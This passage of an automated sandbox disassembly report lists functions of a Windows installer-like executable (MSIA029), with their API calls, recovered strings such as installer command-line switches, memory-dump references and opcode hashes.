                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00F3CBB6
                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00F8E6D0,00000800), ref: 00F3CBD3
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: OpenQueryValue
                                                                                                                                                                                                                                                  • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                                                                                                                                                                                  • API String ID: 4153817207-482544602
                                                                                                                                                                                                                                                  • Opcode ID: 39eed04246a3cb37b71f2165152178850e95e150aef96ffcc206ac3b78d76073
                                                                                                                                                                                                                                                  • Instruction ID: e1c540c1a30fabfc5b6f1196756868984459c9bcc5628eefa1520380a2aeef82
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39eed04246a3cb37b71f2165152178850e95e150aef96ffcc206ac3b78d76073
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCC11335E002168BCF34AF24C81137AB7A1EF95B70F598459E889AB291E770CD82F7D0
                                                                                                                                                                                                                                                  Function 00F6DE24 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00F642D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F6DEE5
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00F642D9,?,?,?,00000055,?,-00000050,?,?), ref: 00F6DF10
                                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00F6DFA4
                                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00F6DFB2
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F6E073
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                                  • API String ID: 4147378913-905460609
                                                                                                                                                                                                                                                  • Opcode ID: bdadae32460b93624daea2234373c4ec2ff8033dca0c055f8a0d2c694d515d51
                                                                                                                                                                                                                                                  • Instruction ID: 895c7d7d596d377e7df42f00d88757584701475111c9f06b1bd77a1c3d8567df
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdadae32460b93624daea2234373c4ec2ff8033dca0c055f8a0d2c694d515d51
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB711476F00306AADB24AB74CC46BBB73A8EF54710F144429F906DB181EBB5E940B7A1
                                                                                                                                                                                                                                                  Function 00F33860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,80A20388,?), ref: 00F338CB
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F3390B
                                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(?,00000000), ref: 00F3395F
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F3397A
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F33A8E
                                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(?,00000000), ref: 00F33AA2
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00F33AF0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 708755948-0
                                                                                                                                                                                                                                                  • Opcode ID: b0318c1c989ff34d3047ce48bae127a2a285a2f1053fff4680c5acdf719242c9
                                                                                                                                                                                                                                                  • Instruction ID: c7ade17b9d8160e54a59b59a50d27db97a946841b1d6cca9897436d56b690295
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0318c1c989ff34d3047ce48bae127a2a285a2f1053fff4680c5acdf719242c9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CA13BB1D01249DFDF10DFA8D988BDEBBF8BF48314F144159E805AB281D7785A44DBA1
                                                                                                                                                                                                                                                  Function 00F6F032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                  • Opcode ID: b9dc25283c1903fe007068dbed81c78d065dc5c25247a3b995f97b1be4b54517
                                                                                                                                                                                                                                                  • Instruction ID: 5764354e4cec2fca04e3094c2f423cc1a466dbc15dcb3f6f1c8f0c2d1660d0c5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9dc25283c1903fe007068dbed81c78d065dc5c25247a3b995f97b1be4b54517
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AD23A72E082298FDB65CF28DD407EAB7B5EB44315F1441EAD80DE7240DB78AE859F41
                                                                                                                                                                                                                                                  Function 00F6E5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00F6E8D1,00000002,00000000,?,?,?,00F6E8D1,?,00000000), ref: 00F6E64C
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00F6E8D1,00000002,00000000,?,?,?,00F6E8D1,?,00000000), ref: 00F6E675
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00F6E8D1,?,00000000), ref: 00F6E68A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                  • Opcode ID: 8291b68b0c401bbb74f2384d76e54190d99d4d117e1e40c328a735c95b2f72e8
                                                                                                                                                                                                                                                  • Instruction ID: 72c4d41202be0dce734e9351fc94b7378d3245af49913e5afb9bb0698f628b90
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8291b68b0c401bbb74f2384d76e54190d99d4d117e1e40c328a735c95b2f72e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D221AC3BF20201AADB348F14C904B9773A6AB74B74B5A8464E90AD7111FB33DE41F791
                                                                                                                                                                                                                                                  Function 00F39CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _swprintf$FreeLocal
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2429749586-0
                                                                                                                                                                                                                                                  • Opcode ID: 7f43bd105ea24fdfac51ad8d481aeb0eea0d4d1c4c07bd5459bc0667e9c0faec
                                                                                                                                                                                                                                                  • Instruction ID: 75d67f86ce2d40f9310e43e2b22f1a8f295e71eb05c9dcf7abf2a60f572d9ba2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f43bd105ea24fdfac51ad8d481aeb0eea0d4d1c4c07bd5459bc0667e9c0faec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76F1BE71D04219AFDF19DFA8DC41BAEBBB5FF08320F144229F911A7280D7B5A941DBA1
                                                                                                                                                                                                                                                  Function 00F6E788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00F6E894
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00F6E8DD
                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00F6E8EC
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F6E934
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F6E953
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 415426439-0
                                                                                                                                                                                                                                                  • Opcode ID: dada088d2f96faea6fa744cbe7ca5f96b2d751f6276822f7115e3bcde02ccbb7
                                                                                                                                                                                                                                                  • Instruction ID: c0303c608ee64c13a7a42e931daa644f0d19da5afd7162a96162f0f0ad9e8c5f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dada088d2f96faea6fa744cbe7ca5f96b2d751f6276822f7115e3bcde02ccbb7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1517E76E00209AFEB20EFB5CC45ABE73B8AF49710F144069E914E7190E7B49944EBA1
                                                                                                                                                                                                                                                  Function 00F65D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                                                                                                  • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                                                                                                  • Instruction ID: 61d7d7eb227164e54688aeba2326475a250930e0601a2bf4cc9aaa9bed8636b2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19B15672D04645AFDB15CF68C881BEEBBA5EF59310F14816AE804FB242D239DD01EBA1
                                                                                                                                                                                                                                                  Function 00F533A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F533B4
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00F53480
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F534A0
                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00F534AA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                                                  • Opcode ID: 68dff0615bb75680bf9f5f992ccf45fa351fabff1ceffda194fd6f103f0c51de
                                                                                                                                                                                                                                                  • Instruction ID: 524c7afd3037bd154dc8a8ca949bc6bb907ee943dd9ca2da538a3a1df190e33d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68dff0615bb75680bf9f5f992ccf45fa351fabff1ceffda194fd6f103f0c51de
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66314975D0531C9BDB10EFA4DD89BCDBBB8AF08305F1040AAE50CAB250EB759B899F45
                                                                                                                                                                                                                                                  Function 00F3D0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F3C630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,80A20388,?,00F73D30,000000FF), ref: 00F3C657
                                                                                                                                                                                                                                                    • Part of subcall function 00F3C630: GetLastError.KERNEL32(?,00000000,00000000,80A20388,?,00F73D30,000000FF), ref: 00F3C661
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,00F88AF0), ref: 00F3D0D8
                                                                                                                                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00F88AF0), ref: 00F3D0E7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F3D0E2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                  • API String ID: 3511171328-631824599
                                                                                                                                                                                                                                                  • Opcode ID: dc381ec7efab9c925ff37426d8ad44cdf2f2b11872b9025d8131d8941b3ec6c0
                                                                                                                                                                                                                                                  • Instruction ID: bfcadaceaad7dc45005ddf5daa6423141c1f1bfed2cd23f06f479c3fbca70550
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc381ec7efab9c925ff37426d8ad44cdf2f2b11872b9025d8131d8941b3ec6c0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFE09BB01187414FD324BF34E8047427BE4AF14720F00886DE459D2651DBB4D488EBA3
                                                                                                                                                                                                                                                  Function 00F6E237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E28B
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E2D5
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E39B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 661929714-0
                                                                                                                                                                                                                                                  • Opcode ID: 463d17204d394063bf0bd5c8efd46ac12dc5f8f4353d9ab505c2526a573ff893
                                                                                                                                                                                                                                                  • Instruction ID: e64e9d01afc618eb613bd92592f4d42f6d10f1bed61e560c2bdc7508d3cb4d98
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 463d17204d394063bf0bd5c8efd46ac12dc5f8f4353d9ab505c2526a573ff893
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD619E7A9102079FEB28DF28CC82BBA77A8EF14311F104179ED05C7285EB78D995EB50
                                                                                                                                                                                                                                                  Function 00F56E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F56F13
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F56F1D
                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F56F2A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                  • Opcode ID: a7b38f1ae563dc59d8b17739105a1bc0378e9439abb735733fed43cb2529b756
                                                                                                                                                                                                                                                  • Instruction ID: d571078a2c3eeaa063c504e4f68ac653e246a0b113f236d03732f52babee6ba5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7b38f1ae563dc59d8b17739105a1bc0378e9439abb735733fed43cb2529b756
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31D274D0122CABCB21DF68DD8978DBBB8AF08311F5041EAE91CA7290E7749B859F45
                                                                                                                                                                                                                                                  Function 00F345B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000,80A20388,00000001,00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?), ref: 00F345DB
                                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?,?,?,?,00F33778), ref: 00F345E6
                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?,?,?), ref: 00F345F4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
